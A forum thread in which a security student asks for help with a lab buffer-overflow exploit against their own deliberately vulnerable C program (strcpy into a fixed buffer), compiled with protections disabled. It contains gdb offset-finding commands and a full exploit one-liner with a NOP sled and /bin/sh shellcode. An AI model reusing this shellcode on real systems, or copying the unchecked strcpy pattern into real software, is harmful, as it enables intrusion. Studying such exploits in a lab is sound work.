Buffer overflow

Hi guys,

so this post will be a little different and is a pretty fun topic,so as you may or may not know I'm a cyber security/ computer science student,I'm doing a project on buffer overflows and exploit dev showing how buffer overflows can occur with insecure C functions such as strcpy() and gets(), but I seem to be having great difficulty actually executing my shellcode.

I created a vulnerable program named example.c here is the source code below

1
2
3
4
5
6
7
8
9
10
11

#include <stdio.h>
#include <string.h>

int main(int argc,char* argv[]){

  char buffer[256];
  strcpy(buffer,argv[1]);
  printf("%s \n", buffer);
  return 0;
}


I've been trying to solve this solution for two days. I messaged a friend on reddit who has been helping me out with it and we have managed to make some progress on it, to begin with I'm using a Linux Ubuntu 16.02 64 bit machine, I turned of ASLR as I know without turning this safe guard off the exploit will not work,I also compiled my program as a 32 bit program and turned off the stack protector

here is the compile options I specified gcc -o example -fno-stack-protector -m32 -z execstack example.c

the program compiles fine and I fire up gdb to debug( to learn about how the exploit works) I set a breakpoint just after the strcpy function is called, I then run the program with the following command - run $(python -c "print('A' * 260)") - this is where the seg fault happens and I get the address 0x41414141 this is what I'm looking for but I then try another run to see if it is indeed overwriting the return address,if it is I should get 0x42424242 printed out, so I run $(python -c "print('A' * 256 + 'BBBB')") - negative 0x41414141 is returned again, so I then run the program again same breakpoint and examine the return address with the x/24wx $ebp+4 command this will show me the contents of the return address and nope it has not been overwritten I keep on incrementing until I see the return address is overwritten here is the point in which it does - run $(python -c "print('A' * 268 + 'BBBB')")

http://pasted.co/8d085c99 as you can see by this paste both the ebp and return address have been overwritten but when the program gets a seg fault it returns a normal looking address,it should return 0x42424242 so something strange is happening.

I then decide to try run my shell code anyway run $(python -c "print('\x90' * 222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x20\xcb\xff\xff')") and something indeed does happen,so the shellcode must be getting executed but not in the correct way ,instead a path shows up and random characters get printed




������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1��F1�1�̀�[[1��C��C

��S
�����/bin/sh����

Program received signal SIGSEGV, Segmentation fault.
0x0804848f in main ()



does anybody have any idea what may be happening and how I can get the exploit to run?

also this is the link to the video I'm following - https://www.youtube.com/watch?v=hJ8IwyhqzD4

thanks

Recompile with -g if you want to debug in gdb:

gcc -o example -g -fno-stack-protector -m32 -z execstack example.c
thanks CCPA,I'll give it a shot
Topic archived. No new replies allowed.